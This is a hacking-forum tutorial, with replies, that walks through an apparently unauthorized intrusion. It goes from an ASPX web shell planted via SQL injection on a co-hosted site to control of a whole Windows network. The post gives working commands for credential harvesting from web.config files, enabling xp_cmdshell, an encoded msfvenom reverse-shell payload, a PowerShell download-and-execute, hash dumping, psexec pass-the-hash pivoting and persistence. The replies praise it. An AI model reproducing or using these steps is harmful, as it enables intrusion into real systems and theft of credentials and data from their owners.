Network Pwnage - From shell to network domination
Network Pwnage - From shell to network domination

Today, I will be showing you how to go from a web shell, to owning the whole network of windows machines. Lets begin with the tools we will be using for this takeover

  1. ASPX Web Shell - - This shell is my go to shell for windows systems. It's got everything I need and have yet to find a better one.
  2. Metasploit - It's metasploit... Thats all I will say about this one.
  3. Basic knowlegde of Windows commands for finding tidbits of information. 
  4. A brain - This is a no brainer Tongue Out

Ok so now we know what tools we are going to be using... let me give you a little background up to the starting point of this tutorial, because frankly walking you through every single step would be tedious, and most of it is basic knowledge up to this point. So, I had a particular website targetted in this attack. After going through the website and NOT finding a vuln area, I ran a reverse whois on the site's IP to find other domains hosted on it. After going through a couple of those websites, I found one with a nice SQL injection and nabbed the admin panel login. From there, I uploaded my aspx shell. Why aspx shell? How did I know? Running NMAP on the target with OS detection was a big hint, aswell as the websites all using as the base, I knew this was an IIS server (windows).

So, I have my shell up.. lets proceed with the take over.

Step 1 - Initial recon
The first thing I do when I get my shell, is to see what account it's running under. Our goal is to run under the "SA" account which is the System Administrator. So lets go to our "CMDSHELL" link on our shell and run the following command.

/c whoami

[Image: ZN9Yd6Y.png][/url]

as you can see, the response is "nt authority\network service". That's no good. Even though we could technically use this to pop a meterpreter shell and use a local exploit to upgrade our connection to SA account and take over from there, I will show you that in a little bit. First, lets see if we can get a direct SA account to begin with, which will help secure our persistence on the server. 

Step 2 - More recon

In this step, our recon is going to branch out a little bit. Normally, in an environment like this (in my experiences) the SQL databases are ran on a different machine, which sometimes run under the SA account. So lets do a few more steps of recon. In our shell, lets go to the "file manager" link and see where about on this particular system we are. We will see the following:

[Image: WVLn2U6.png]

Now if you look at the screenshot I provided, you will notice 2 things. 1st, the IP of the website "top right, circled in green" is the IP of the website on the local machine.. this doesn't mean its actually the machines internal IP.. On set ups like this, Internal IP's are routed per website when hosting multiple websites.. so that IP doesn't do us much good. 2nd, As you can see, this website is on the "D:\" drive under a folder called 'websites'. So, at this point, I am going to map out the network a little bit, and see just how many machines I can find on it, and go from there.

So, before we continue, using the "File manager" Lets go and make sure we can view at least SOME of the C:\ drive.

[Image: 2GCmDCh.png]

BINGO! Now that we know we can access the C:\ drive, and the temp folder, I will use that. If you can't, then u can use the local folder your shell is on, which in this case is the "d:\websites\blahblahblah" you will see in the file manager. From here, lets go back to the "CMDSHELL" and run the following:

/c ipconfig /all > C:\temp\ipconfig.txt

This command is saying 'run the ipconfig command and output the results into ipconfig.txt in the C:\temp\ folder'. When it's done running, lets go view that file and see whats inside. The file is like this: 

[Image: HhyWKFG.png]

So, we notice something here... On this particular ethernet controller, we have a big list of ip's dedicated to it. at the top we have the hostname "WS1" and then you see the ip's... To me, what stands out here is this... "" is more than likely the machines ACTUAL internal IP, and the rest are dedicated to the websites hosted on it.

So at this point, I have but where is .1 - .4, and .6 - whatever? So, lets do a bit more recon.

lets run the following command, and see what IP's it will give us:

/c arp -a

[Image: Mo3AAGw.png]

OH SNAP! So as marked in the screenshot, there are a couple other IP's showing up now, and judging by the 'Pyshical Adresses' of their device, probably means they are seperate machines. We know the ".1" address is probably the router, so we arent worried about that. but we have atleast 3 other machines to target. So, we have a tad bit more of recon to do before we really get into the fun stuff. 

Next, we will be using the database to see what we can gain. So, lets go back to our file manager, and find the web.config file of our shelled website, so we can access the database. We will be looking in this file for our "Connection String". So on this step, open another tab with your shell in it.. (chrome you can "duplicate tab". In this 2nd shell tab, go to your "database" link and you will see 2 boxes. In the right box, click "MSSQL" and it will fill in the Left hand box with what info you will need for logging in to the database.

[Image: J7pAn5d.png]

Now, back in the first shell tab, lets explore the web.config file and find this info.

[Image: EaZtPrs.png]

Ok, so we peeked in the web.config file and see the above connection string, it's not a very good one as it has no UID or Password to login with, and it also doesn't provide a good database source. Thats ok though! We will now use our file manager to go through the other websites web.config files to find a good connection string and go from there. 

Note: at this point, it's a very good idea to go through EVERY web.config file you can find,Especially in the "CGI-BIN" folders, until you can find one that looks like an admin login to the database. Why? Well generally, they will have their "Roles" set up to use the "SA" account. So, basically this is the crappy part, we try connection strings found until we have something with a good database connection. If you don't find an admin account, it's fine! Because in method two later in this tutorial, We will still gain the System privileges!

So, after some digging, I found myself a nice little admin login to the database. But! Thats not all! Here he actually has 3 connections for this website. 2 regular, and 1 admin. 

[Image: V9QhjqP.png]

Well this is great! So.. lets see what we can gain from the database now. 

So, upon initial inspection of the connection strings, we see it's calling to this must be the machine holding the SQL Server... that means we have now identified one of the other 3 machines (leaving the router out of it).. only 2 more to go!

Lets start off with connecting via an admin string, to see what it throws at us. Go to your database tab, and we would put this in.

[Image: IPohKws.png]

Well.. thats interesting, for this particular database, it's running as db_owner... but thats cool for now. in the drop down box for "select database" we will see a list of the databases the SQL server is holding, take note of these! Why? In case the admin user is running under SA account for one of them... So lets go through the databases, selecting them one by one and if you want, peek around at the goodies inside!

heres the current db we should be connected to... the red lines are next to tables I would find interesting myself..

[Image: tvHabXG.png]

Now, when you are done rambling through the databases, lets proceed to find out what access we currently have on the system by using the "SQLExec" dropdown box. First, we select "ADD xp_cmdshell" and we will see the following:

[Image: mvRUkvj.png][url=]

Hit the query button. After that, in the sqlexec dropdown select "XP_cmdshell exec" and you will see the following:

[Image: lwVYeQj.png]

What this command does, is run commands on the SYSTEM... though at the moment we don't have SA privileges, lets run the following command and see what it says.

Exec master.dbo.xp_cmdshell 'whoami'

Hit query. Here you will either get "nt authority\network service" or an error. Either way, the hell with that! We have another trick up our sleeve! So you remember when I said to take note of the databases listed in the dropdown? Here is why. No matter what database we select, we are still connected to the initial DB with "DB_Owner" rights... so in our connection string, lets change the "initial catalog" to another database, going through each of them until we find one running under "SA" or we run out of luck. 

After going through the databases, I found one that gave me "SA" when I connected to it.. BINGO!!!!

[Image: Wf4ZDCN.png]

lets rerun that xp_cmdshell command again and see what it says now!

[Image: pMdgC2s.png]

Jackpot! Now, here is where we get creative and begin serious exploitation. 

Lets begin with the the SQL server, because it's running as SYSTEM so our shell will have the most privileges there.

Open up metasploit and we will start off with creating an EXE file that will give us a meterpreter shell. Lets run the following in metasploit.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=4444 X -b "\x00" -e x86/shikata_ga_nai -f exe -o /root/uber.exe

Be sure to change your LHOST value to your listening servers (metasploits) IP address. After that, we will need to upload this to one of the servers and get it to run. 

Next, we need a place it can be directly downloaded from. For this, I will use another shelled website providing a direct link.. go upload it somewhere and get the direct url for the exe you made. 

So lets go run this following command in the "xp_cmdshell exec" back on our web shell and hope it works.

Exec master.dbo.xp_cmdshell "powershell.exe (new-object System.Net.WebClient).DownloadFile('','C:\temp\uber.exe');"

Give this a sec to run and download the file. Then lets head back over to metasploit and set up the listener with the following commands:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444

When you have your listener up, head back to your web shell and lets run the following with the xp_cmdshell exec:

Exec master.dbo.xp_cmdshell "cd C:\temp\ & uber.exe"

Give it a second and you should be getting a shell on metasploit like so:

[Image: M2HhZXG.png]

Now that we have a shell, lets see what its running as... which should be system.

[Image: vlKoiUK.png]

now run the following and take note of the domain its on


AWESOME!!!! Now lets exploit the rest of the servers!

Now, usually these networks are set up on an internal domain, which also usually share the same administrator logins. Lets exploit this and use this machine to pivot through the network. 

on your meterpreter run the following:


This will give you something like this :

[Image: imjZNG5.png]

Ok sweet, we have hashes for the accounts that login to this system. The sweet thing about this, is that we don't even need to crack them!

now, go to meterpreter and copy the usernames and hashes, then background the session by running the following:

Now, before we can exploit it, we need to add a route so our pivoting machine can communicate to all the others. Do this by running the following.. Using the internal ip setup as reference:
route add 1

note the 1 at the end, is your session number in metasploit

[Image: kX3SN88.png]

Next, is to set up which exploit we will use and the options.

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:c46b285d947b7aff9dc4ad0b13f67e7f
set rhost

RHOST is the machine we want to attack this go round.

[Image: 5cn4MkQ.png]

now type run and hit enter

this is what you should get if that user/hash combo works

[Image: 5h19zNi.png]

If you get a login error, keep trying the others credentials... since this worked, I now have a meterpreter shell on the machine hosting the websites where our shell is located! Now, lets try the other 2 machines we dont know anything of.

in meterpreter, background the new session and do the following:

set rhost

Looky there! We got another one! Just one left.. so repeat the last step using the other machines IP

[Image: ItrxqBL.png]

Now we have all systems compromised, other than the router. So if we background our last session and run the following, we can see we now have meterpreter shells to all 4 of these machines.

[Image: Pdmk8FZ.png]

As you can see, using the administrator login for this exploit, we successfully gained SYSTEM privs on every machine with ease. Now you can run your persistence, install things, whatever you need to do. If you lose the sessions, just go back to your webshell and run the command to open your exe via xp_cmdshell and viola! 

I would say this has been a success! In tutorials to come, I will show some other methods of gaining system level privs.. and some other nifty tricks.
Dude, that is some good in-depth information you have shared with us!
Cheers for that, was handy and shall be keeping this thread closeby!
Awesome post, kuro :)
I don't see why no one has commented on this yet. It's a great and very detailed tutorial. Keep up your posts mate, the site is getting more HQ with every thread you post.
Congratulations to @ubersaki for Best Tutorial of the Summer '16 Event. This thread was selected as being the best one posted during the contest window.

Forum Jump:

Users browsing this thread: 1 Guest(s)